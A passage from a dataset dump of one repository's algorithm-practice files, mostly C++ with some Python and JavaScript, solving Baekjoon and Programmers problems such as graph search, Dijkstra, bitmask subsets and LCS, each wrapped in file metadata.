while(new_id.length() != 3) new_id += ch;\n }\n \n string answer = new_id;\n\n return answer;\n}\n\nint main() {\n string answer = solution(\"...!@BaT#*..y.abcdefghijklm\");\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.5250403881072998, "alphanum_fraction": 0.5420032143592834, "avg_line_length": 24.285715103149414, "blob_id": "816b8773c45b2bc4a84ee56ada33d9f7b86c920d", "content_id": "9bbc96c5185f1a2c47b98c28d835e35f426d5584", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1306, "license_type": "no_license", "max_line_length": 82, "num_lines": 49, "path": "/programmers/Level 1/report_result.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 신고 결과 받기\n2022 KAKAO BLIND RECRUITMENT\nDATE: 2022-04-02\n*/\n#include <string>\n#include <vector>\n#include <map>\n#include <set>\n#include <algorithm>\nusing namespace std;\n\nbool cmp(pair<string, int> p1, pair<string, int> p2) {\n return p1.second < p2.second;\n}\n\nvector<int> solution(vector<string> id_list, vector<string> report, int k) {\n vector<int> answer(id_list.size());\n map<string, int> id, mail; \n map<string, set<string>> all_report; // 신고 당한 유저, 신고한 유저의 집합\n \n for(auto i : report){\n int idx = i.find(' ');\n string a = i.substr(0, idx); // 신고한 ID\n string b = i.substr(idx + 1); // 신고당한 ID\n\n if(all_report[b].find(a) != all_report[b].end()) continue; \n all_report[b].insert(a);\n id[b]++; // b가 신고당한 횟수\n }\n \n for(int i = 0 ; i < id_list.size() ; i++) mail[id_list[i]] = 0;\n \n for(auto i : id){\n string user_id = i.first;\n int cnt = i.second;\n \n if(cnt >= k) {\n for(auto j : all_report[user_id]) mail[j]++;\n }\n }\n \n for(auto i : mail) {\n int idx = find(id_list.begin(), id_list.end(), i.first) - id_list.begin();\n answer[idx] = i.second;\n }\n \n return answer; \n}" }, { "alpha_fraction": 0.45571956038475037, "alphanum_fraction": 0.49261993169784546, "avg_line_length": 18.39285659790039, "blob_id": "352152e7a6934dc139fe2ae5d8ba777551e0e096", "content_id": "3aab69c5aaabdac36db8ff760289fa91e3a8820a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 556, "license_type": "no_license", "max_line_length": 83, "num_lines": 28, "path": "/BOJ/Implementation/11651.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11651번: 좌표 정렬하기 2\nDATE: 2021-04-29\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\npriority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> pq;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n int x, y;\n cin >> x >> y;\n pq.push(make_pair(y, x));\n }\n\n for(int i = 0 ; i < n ; i++){\n cout << pq.top().second << \" \" << pq.top().first << '\\n';\n pq.pop();\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3916161060333252, "alphanum_fraction": 0.4175399839878082, "avg_line_length": 21.395061492919922, "blob_id": "f199aed395fb7076a30ea476c2679bf620a9dcdc", "content_id": "04d097e6e6fd78351c75a44283b45974beeb5886", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2055, "license_type": "no_license", "max_line_length": 99, "num_lines": 81, "path": "/BOJ/BFS_DFS/16236.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16236번: 아기 상어\nDATE: 2021-04-11\nBFS\n*/\n#include <iostream>\n#include <queue>\n#include <tuple>\n#include <cstring>\n#include <algorithm>\n#define MAX 20\nusing namespace std;\n\nint arr[MAX][MAX];\nint n; \nint shark=2, eat, mv; //상어의 크기, 상어가 먹은 물고기 수, 상어가 움직인 횟수\nbool visited[MAX][MAX];\nint dx[4] = {0, 1, 0, -1};\nint dy[4] = {1, 0, -1, 0};\n\npriority_queue<tuple<int, int, int>> pq;\n//최소힙의 우선순위는 이동거리 - x좌표 - y좌표\n//문제의 우선순위가 거리가 가까운 것 - 가장 위쪽 - 가장 왼쪽이기 때문에\n\nvoid bfs(){\n tuple<int, int, int> t;\n\n while(!pq.empty()){\n t = pq.top();\n int d = -get<0>(t);\n int x = -get<1>(t);\n int y = -get<2>(t);\n pq.pop();\n\n if(0 < arr[x][y] && arr[x][y] < shark){ //해당 위치의 물고기를 먹을 수 있는 경우\n eat++;\n arr[x][y] = 0;\n if(shark == eat){ //상어의 크기 수만큼 물고기를 먹었을 때\n eat = 0;\n shark++;\n }\n\n mv += d;\n d = 0;\n memset(visited, false, sizeof(visited));\n while(!pq.empty()) pq.pop();\n }\n\n for(int i = 0 ; i < 4 ; i++){\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx >= 0 && ny >= 0 && nx < n && ny < n && arr[nx][ny] <= shark && !visited[nx][ny]){\n visited[nx][ny] = true;\n pq.push(make_tuple(-(d+1), -nx, -ny));\n }\n }\n\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n;\n \n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n cin >> arr[i][j];\n if(arr[i][j] == 9){\n pq.push(make_tuple(0, -i, -j)); //우선순위 큐를 min heap으로 바꾸기 위해 음수 처리\n arr[i][j] = 0;\n visited[i][j] = true;\n }\n }\n }\n\n bfs();\n cout << mv;\n \n return 0;\n}" }, { "alpha_fraction": 0.36638572812080383, "alphanum_fraction": 0.3886960744857788, "avg_line_length": 22.74117660522461, "blob_id": "c27b1ac93afedca9c5142a06047957f19d770c50", "content_id": "e9f36360bc0384a231dde70360b8836d47a4be4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2077, "license_type": "no_license", "max_line_length": 97, "num_lines": 85, "path": "/BOJ/BFS_DFS/16234.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16234번: 인구 이동\nDATE: 2021-11-10\nDFS\n*/\n#include <iostream>\n#include <queue>\n#include <string.h>\n#define MAX 50\nusing namespace std;\nint n, l, r, sum = 0;\nint arr[MAX][MAX];\nbool visited[MAX][MAX];\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\nvector<pair<int,int>> v;\n\nvoid dfs(int x, int y) {\n v.push_back(make_pair(x, y));\n visited[x][y] = true;\n sum += arr[x][y];\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n || visited[nx][ny]) continue;\n if(abs(arr[nx][ny] - arr[x][y]) < l || abs(arr[nx][ny] - arr[x][y]) > r) continue;\n dfs(nx, ny);\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int ans = 0;\n cin >> n >> l >> r;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n cin >> arr[i][j];\n }\n }\n\n while(1) {\n memset(visited, false, sizeof(visited));\n vector<pair<pair<int,int>, int>> record;\n int cnt = 0;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n if(!visited[i][j]) {\n v.clear(); sum = 0;\n dfs(i, j);\n\n if(v.size() == 1) {\n visited[i][j] = false;\n cnt++;\n continue;\n }\n\n int num = sum / v.size();\n for(int i = 0 ; i < v.size() ; i++) {\n record.push_back({{v[i].first, v[i].second}, num}); // (값을 변경할 위치, 변경할 값)\n }\n }\n }\n }\n\n if(cnt == n * n) break; // 더 이상 인구 이동이 불가능한 경우\n\n for(int i = 0 ; i < record.size() ; i++) {\n int x = record[i].first.first;\n int y = record[i].first.second;\n int num = record[i].second;\n\n arr[x][y] = num;\n }\n\n ans++;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4248366057872772, "alphanum_fraction": 0.4901960790157318, "avg_line_length": 13.619047164916992, "blob_id": "23cae1492d24f19281d7e9027ffe60c00bef8f73", "content_id": "0f8ecac9a1cc8c4fc29fab054e1d48eda2bf7990", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 314, "license_type": "no_license", "max_line_length": 58, "num_lines": 21, "path": "/BOJ/Bitmask/1094.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1094번: 막대기\nDATE: 2022-01-25\nBitmask\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, ans = 0;\n cin >> n;\n\n for(int i = 0 ; i < 7 ; i++) {\n if(n & (1 << i)) ans++;\n }\n\n cout << ans;\n \n return 0;\n}" }, { "alpha_fraction": 0.342803031206131, "alphanum_fraction": 0.3797348439693451, "avg_line_length": 17.224138259887695, "blob_id": "85f950df0e2ecd1943cadad08c857019a093499c", "content_id": "2ffe02171c1f780b48e87b9884ae33766406f948", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1106, "license_type": "no_license", "max_line_length": 58, "num_lines": 58, "path": "/BOJ/Implementation/2866.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2866번: 문자열 잘라내기\nDATE: 2021-11-16\n*/\n#include <iostream>\n#include <set>\nusing namespace std;\n\nchar arr[1000][1000];\nint r, c;\n\nbool check_overlap() { // 마지막 줄만 검사\n int alpha[26] = {0, };\n bool flag = true;\n\n for(int i = 0 ; i < c ; i++) {\n if(++alpha[arr[r-1][i] - 97] > 1) {\n flag = false;\n break;\n }\n }\n\n return flag;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int cnt = 0;\n cin >> r >> c;\n\n for(int i = 0 ; i < r ; i++) {\n for(int j = 0 ; j < c ; j++) {\n cin >> arr[i][j];\n }\n }\n\n if(check_overlap()) cout << r - 1; // 문자열 중복 X\n else { // 문자열 중복 O\n string str[c];\n set<string> s;\n\n for(int i = r - 1 ; i >= 0 ; i--) {\n for(int j = 0 ; j < c ; j++) {\n str[j] += arr[i][j];\n s.insert(str[j]);\n }\n\n if(s.size() == c) {\n cout << i;\n break;\n }\n\n s.clear();\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.39054054021835327, "alphanum_fraction": 0.4445945918560028, "avg_line_length": 24.55172348022461, "blob_id": "09bdcc14fd66bfd15bf6e9867104718f15dc3956", "content_id": "e0d677d2e9a52749aaeeef84819680f69f2fd5b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 742, "license_type": "no_license", "max_line_length": 107, "num_lines": 29, "path": "/BOJ/Dynamic Programming/1958.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1958번: LCS 3\nDATE: 2022-02-17\nDynamic Programming (Longest Common Subsequence)\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint dp[101][101][101];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string a, b, c;\n cin >> a >> b >> c;\n\n for(int i = 1 ; i <= a.length() ; i++){\n for(int j = 1 ; j <= b.length() ; j++){\n for(int k = 1 ; k <= c.length() ; k++){\n if(a[i - 1] == b[j - 1] && b[j - 1] == c[k - 1]) dp[i][j][k] = dp[i - 1][j - 1][k - 1] + 1;\n else dp[i][j][k] = max({dp[i - 1][j][k], dp[i][j - 1][k], dp[i][j][k - 1]});\n }\n }\n }\n \n cout << dp[a.length()][b.length()][c.length()];\n\n return 0;\n}" }, { "alpha_fraction": 0.47398844361305237, "alphanum_fraction": 0.49793559312820435, "avg_line_length": 19.542373657226562, "blob_id": "e3dc59bb3d7fcd421cfe7ea4dafc1d64ee212093", "content_id": "95e71d7898bd6837566eaea6dab0767608d3d9d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1221, "license_type": "no_license", "max_line_length": 84, "num_lines": 59, "path": "/BOJ/Dijkstra/5972.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 5972번: 택배 배송\n2021-12-29\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 50001\n#define INF 1e9\nusing namespace std;\n\nint d[MAX];\nvector<pair<int, int>> graph[MAX];\n\nvoid dijkstra(int start) {\n priority_queue<pair<int,int>, vector<pair<int,int>>, greater<pair<int,int>>> pq;\n \n pq.push({0, start});\n d[start] = 0;\n\n while(!pq.empty()) {\n int distance = pq.top().first;\n int cur = pq.top().second;\n pq.pop();\n\n if(distance > d[cur]) continue; \n for(int i = 0 ; i < graph[cur].size() ; i++) {\n int newDistance = graph[cur][i].second;\n int next = graph[cur][i].first;\n\n if(newDistance + distance < d[next]) {\n d[next] = newDistance + distance;\n pq.push({d[next], next});\n }\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n int a, b, c;\n\n cin >> n >> m;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> a >> b >> c;\n graph[a].push_back({b, c});\n graph[b].push_back({a, c});\n }\n\n fill(d, d + n + 1, INF);\n\n dijkstra(1);\n cout << d[n];\n \n return 0;\n}" }, { "alpha_fraction": 0.47730061411857605, "alphanum_fraction": 0.5030674934387207, "avg_line_length": 17.545454025268555, "blob_id": "3cd1692539828ab077dcebeccb8e8cd329f58b0d", "content_id": "0a5f3e4d9478af326abae0e0c8e9ac96dcb462ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 819, "license_type": "no_license", "max_line_length": 35, "num_lines": 44, "path": "/BOJ/BFS_DFS/1260.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# 1260.py\n# BOJ 1260번: DFS와 BFS\n# DATE: 2022-03-15\nimport sys\nfrom collections import deque\nread = sys.stdin.readline\n\ndef dfs(v):\n print(v, end=' ')\n visited[v] = True\n \n for i in graph[v]:\n if not visited[i]:\n dfs(i)\n\ndef bfs(n):\n visited[n] = True;\n queue = deque([n])\n \n while queue:\n v = queue.popleft()\n print(v, end=' ')\n \n for i in graph[v]:\n if not visited[i]:\n queue.append(i)\n visited[i] = True\n \nn, m, v = map(int, read().split())\ngraph = [[] for _ in range(n+1)]\nvisited = [False] * (n+1)\n\nfor _ in range(m):\n a, b = map(int, read().split())\n graph[a].append(b)\n graph[b].append(a)\n\nfor i in range(1, n+1):\n graph[i].sort()\n \ndfs(v)\nvisited = [False] * (n+1)\nprint()\nbfs(v)" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.4680851101875305, "avg_line_length": 14.325581550598145, "blob_id": "e70c5b6e009c456c71e388bb9301f7a404daec0e", "content_id": "b6bf56915fb1640b23da7755cba2a4dcc6595b26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 672, "license_type": "no_license", "max_line_length": 58, "num_lines": 43, "path": "/BOJ/BFS_DFS/1182.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1182번: 부분수열의 합\nDATE: 2022-02-04\nBacktracking\n*/\n#include <iostream>\nusing namespace std;\n\nint n, s, ans;\nint arr[21];\nbool visited[21];\n\nvoid dfs(int num) {\n int sum = 0;\n\n for(int i = 1 ; i <= n ; i++) {\n if(visited[i]) sum += arr[i];\n }\n\n if(sum == s) ans++;\n\n for(int i = num ; i <= n ; i++) {\n if(visited[i]) continue;\n\n visited[i] = true;\n dfs(i + 1);\n visited[i] = false;\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> s;\n\n for(int i = 1 ; i <= n ; i++) cin >> arr[i];\n\n dfs(1);\n if(s == 0) ans--;\n \n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3451612889766693, "alphanum_fraction": 0.3774193525314331, "avg_line_length": 15.92727279663086, "blob_id": "9ecb17ea437ce400a0ebebe41826576d84ffe878", "content_id": "d7e34b37c03138ba1f1f2cc1c0125f1aa760ed35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 940, "license_type": "no_license", "max_line_length": 58, "num_lines": 55, "path": "/BOJ/BFS_DFS/11403.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 11403번: 경로 찾기\nDATE: 2021-02-22\nBFS\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint n;\nint arr[101][101];\n\nvoid bfs(int num){\n bool visited[n] = {false, };\n queue<int> q;\n\n q.push(num);\n\n while(!q.empty()){\n int cur = q.front();\n q.pop();\n\n for(int i = 0 ; i < n ; i++){\n if(arr[cur][i] && !visited[i]){\n q.push(i);\n visited[i] = true;\n arr[num][i] = 1;\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n;\n\n for(int i = 0 ; i < n ; i ++){\n for(int j = 0 ; j < n ; j++){\n cin >> arr[i][j]; \n }\n }\n\n for(int i = 0 ; i < n ; i++){\n bfs(i);\n }\n\n for(int i = 0 ; i < n ; i ++){\n for(int j = 0 ; j < n ; j++){\n cout << arr[i][j] << \" \"; \n }\n cout << \"\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.6489361524581909, "alphanum_fraction": 0.7021276354789734, "avg_line_length": 30.33333396911621, "blob_id": "a07a257eb16f8cf1bc76efd2268b4761f99186f1", "content_id": "fe62c44c49a62509c9b785a1c43e0993d777d31a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 134, "license_type": "no_license", "max_line_length": 59, "num_lines": 3, "path": "/README.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# ALGORITHM \n### 백준, 프로그래머스 문제 풀이\n자세한 풀이는 (https://9x211x2.tistory.com/category/ALGORITHM) ✏✏\n" }, { "alpha_fraction": 0.4636678099632263, "alphanum_fraction": 0.49596309661865234, "avg_line_length": 16.360000610351562, "blob_id": "a4c81e91c2cb7936b18d3473997a30282e559029", "content_id": "ed8c47a214f84f7804f760347c65bd45f6933aa8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 877, "license_type": "no_license", "max_line_length": 52, "num_lines": 50, "path": "/programmers/Level 1/make_prime_number.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1: 소수 만들기\n//2021-10-11\n#include <vector>\n#include <math.h>\n#include <iostream>\nusing namespace std;\n\nvector<int> v;\nint cArr[3];\nint answer = 0;\n\nbool isPrime(int num) {\n if(num < 2) return false;\n \n for(int i = 2 ; i <= sqrt(num) ; i++) {\n if(num % i == 0) return false;\n }\n \n return true;\n}\n\nvoid combination(int depth, int next) {\n if(depth == 3) {\n int sum = 0;\n \n for(int i = 0 ; i < 3 ; i++) sum += cArr[i];\n if(isPrime(sum)) answer++;\n \n return;\n }\n \n for(int i = next ; i <= v.size() ; i++) {\n cArr[depth] = v[i - 1];\n combination(depth + 1, i + 1);\n }\n}\n\nint solution(vector<int> nums) {\n v = nums;\n combination(0, 1);\n \n return answer;\n}\n\nint main() {\n int answer = solution({1, 2, 3, 4});\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.3113890588283539, "alphanum_fraction": 0.3429888188838959, "avg_line_length": 20.11111068725586, "blob_id": "a37d3097c89ced02bcdacf58ec500c4f9ae26118", "content_id": "4be2ea597fb7c27ce424da89084241226e719749", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1621, "license_type": "no_license", "max_line_length": 71, "num_lines": 72, "path": "/BOJ/Implementation/20055.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 20055번: 컨베이어 벨트 위의 로봇\nDATE: 2021-10-21\n*/\n#include <iostream>\n#include <vector>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, k, in, out;\n int ans = 0;\n cin >> n >> k;\n\n in = 0; out = n - 1; // 올리는 위치, 내리는 위치\n vector<pair<int,int>> v(n + n); // 내구도, 로봇 존재 여부\n \n for(int i = 0 ; i < n + n ; i++) {\n cin >> v[i].first;\n v[i].second = 0;\n }\n\n while(1) {\n bool flag = true;\n int check = 0;\n ans++; // 단계\n\n // 한 칸씩 회전\n pair<int,int> tmp = v[n + n - 1];\n\n for(int i = n + n - 2 ; i >= 0 ; i--) v[i + 1] = v[i];\n v[0] = tmp;\n\n if(v[out].second) v[out].second = 0;\n\n // 로봇 이동\n for(int i = n - 2 ; i >= 0 ; i--) {\n if(!v[i + 1].second && v[i].second && v[i + 1].first > 0) {\n v[i].second = 0;\n v[i + 1].first -= 1;\n v[i + 1].second = 1;\n\n if(i + 1 == out) {\n v[i + 1].second = 0;\n }\n }\n }\n\n // 로봇 올리기\n if(v[in].first > 0) {\n v[in].first -= 1;\n v[in].second = 1;\n }\n\n // 내구도 확인\n for(int i = 0 ; i < n + n ; i++) {\n if(v[i].first == 0) {\n check++;\n if(check == k) {\n flag = false;\n break;\n }\n }\n }\n\n if(!flag) break;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3111254870891571, "alphanum_fraction": 0.3363518714904785, "avg_line_length": 23.95161247253418, "blob_id": "72dca78abe27b61b8961e1bcf0f636cf8a92294b", "content_id": "5ed24ecf020609305e76ce3ef65291812cb122ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1552, "license_type": "no_license", "max_line_length": 94, "num_lines": 62, "path": "/BOJ/Two Pointer/17609.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 17609번: 회문\nDATE: 2022-03-18\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int t;\n string orgStr, revStr;\n\n cin >> t;\n\n while(t--){\n cin >> revStr;\n\n orgStr = revStr;\n reverse(revStr.begin(), revStr.end());\n\n if(orgStr == revStr) cout << 0 << '\\n';\n else{\n int s = 0, e = orgStr.length() - 1;\n int cnt = 0;\n\n while(s < e){\n if(orgStr[s] == orgStr[e]){\n s++;\n e--;\n }\n else if(orgStr[s + 1] == orgStr[e] && orgStr[s] != orgStr[e - 1] && cnt == 0){\n cnt++;\n s++;\n }\n else if(orgStr[s] == orgStr[e - 1] && orgStr[s + 1] != orgStr[e] && cnt == 0){\n cnt++;\n e--;\n }\n else{\n string A = orgStr, B = orgStr;\n A.erase(s, 1);\n B.erase(e, 1);\n \n string revA = A, revB = B;\n reverse(revA.begin(), revA.end());\n reverse(revB.begin(), revB.end());\n\n if(revA == A || revB == B) cout << 1 << '\\n';\n else cout << 2 << '\\n';\n\n cnt = 100000;\n break;\n }\n }\n\n if(cnt == 1) cout << 1 << '\\n';\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3979797959327698, "alphanum_fraction": 0.4484848380088806, "avg_line_length": 14.030303001403809, "blob_id": "14bafcf51503c339a6fc076b05ed6bf5186098dd", "content_id": "019510e9d42fb4c12322e272c4a7ab5ae92c4694", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 507, "license_type": "no_license", "max_line_length": 58, "num_lines": 33, "path": "/BOJ/Implementation/14425.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 14425번: 문자열 집합\nDATE: 2021-02-15\n*/\n#include <iostream>\n#include <map>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, cnt=0;\n cin >> n >> m;\n\n map<string, int> m1;\n\n for(int i = 0 ; i < n ; i++){\n string str;\n cin >> str;\n\n m1[str] = 1;\n }\n\n for(int i = 0 ; i < m ; i++){\n string str;\n cin >> str;\n \n if(m1[str] == 1) cnt++;\n }\n\n cout << cnt;\n\n return 0;\n}" }, { "alpha_fraction": 0.40799999237060547, "alphanum_fraction": 0.4533333480358124, "avg_line_length": 18.256410598754883, "blob_id": "33d0f942f1c9c3653c6201c9917b79ecf5a046e0", "content_id": "07635befae89dbf78e7b37ceb95eb3dd7368825d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 790, "license_type": "no_license", "max_line_length": 58, "num_lines": 39, "path": "/BOJ/Bitmask/2961.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2961번: 도영이가 만든 맛있는 음식\nDATE: 2022-01-26\nBitmask\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, a, b;\n long long minimum = 10000000000;\n cin >> n;\n\n vector<pair<int,int>> vec(n);\n\n for(int i = 0 ; i < n ; i++) {\n cin >> vec[i].first >> vec[i].second;\n }\n\n for(int i = 1 ; i < (1 << n) ; i++) { // 부분 집합 전체 개수\n long long a = 1, b = 0;\n\n for(int j = 0 ; j < n ; j++){\n if(i & (1 << j)) {\n a *= vec[j].first; \n b += vec[j].second;\n }\n }\n\n minimum = min(minimum, abs(a - b));\n }\n\n cout << minimum;\n \n return 0;\n}" }, { "alpha_fraction": 0.42115384340286255, "alphanum_fraction": 0.4596153795719147, "avg_line_length": 16.366666793823242, "blob_id": "0e526f4b44c0dfd7ef928588e69fd94057a89830", "content_id": "25dd14f9023aff849914ba98c51d401585d8a3d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 532, "license_type": "no_license", "max_line_length": 60, "num_lines": 30, "path": "/BOJ/Implementation/11728.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11728번: 배열 합치기\n2021-12-28\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> v;\n int a, b, n;\n cin >> a >> b;\n\n for(int i = 0 ; i < a ; i++) {\n cin >> n;\n v.push_back(n);\n }\n\n for(int i = 0 ; i < b ; i++) {\n cin >> n;\n v.push_back(n);\n }\n\n sort(v.begin(), v.end());\n for(int i = 0 ; i < v.size() ; i++) cout << v[i] << \" \";\n\n return 0;\n}" }, { "alpha_fraction": 0.4411085546016693, "alphanum_fraction": 0.48960739374160767, "avg_line_length": 12.151515007019043, "blob_id": "63b544087844ff73f4b25e744b2c3b37b03d8e98", "content_id": "b9e1c314b329c43f119045bc6300d9769e4b13fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 441, "license_type": "no_license", "max_line_length": 30, "num_lines": 33, "path": "/BOJ/Implementation/11279.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "WINDOWS-1252", "text": "/*\nBOJ 11279¹ø: ÃÖ´ë Èü\nDATE: 2021-01-06\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0);\n\tcin.tie(0);\n\n\tint n, x;\n\tpriority_queue<int> pq;\n\n\tcin >> n;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tcin >> x;\n\t\tif (x != 0) {\n\t\t\tpq.push(x);\n\t\t}\n\t\telse if (x == 0) {\n\t\t\tif (pq.empty()) {\n\t\t\t\tcout << 0 << \"\\n\";\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tcout << pq.top() << \"\\n\";\n\t\t\tpq.pop();\n\t\t}\n\t}\n\treturn 0;\n}" }, { "alpha_fraction": 0.4329896867275238, "alphanum_fraction": 0.47766321897506714, "avg_line_length": 14.368420600891113, "blob_id": "e09ada9a1eb2b4efac11c21eeac24b1f4a6177c8", "content_id": "0496568ddd203dd959ea38c3027cd3cec1b926af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 295, "license_type": "no_license", "max_line_length": 47, "num_lines": 19, "path": "/programmers/Level 2/carpet.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 카펫\n2021-12-27\n*/\nfunction solution(brown, yellow) {\n let answer = [];\n let h = 3, w;\n\n while (1) {\n w = Math.floor((brown + yellow) / h);\n\n if ((h - 2) * (w - 2) == yellow) break;\n h++;\n }\n\n answer.push(w, h);\n\n return answer;\n}" }, { "alpha_fraction": 0.33853355050086975, "alphanum_fraction": 0.40873634815216064, "avg_line_length": 17.882352828979492, "blob_id": "34535d0335d4f12a7ef82ebe23677801b35acaf7", "content_id": "083748add1b612e24102102b880b8a2437e656a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 655, "license_type": "no_license", "max_line_length": 75, "num_lines": 34, "path": "/BOJ/Prefix Sum/11660.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11660번: 구간 합 구하기 5\nDATE: 2022-01-22\nPrefix Sum\n*/\n#include <iostream>\nusing namespace std;\n\nint arr[1025][1026];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, ans = 0;\n int x1, y1, x2, y2;\n cin >> n >> m;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n cin >> arr[i][j];\n arr[i][j] += arr[i][j - 1];\n }\n }\n \n for(int i = 0 ; i < m ; 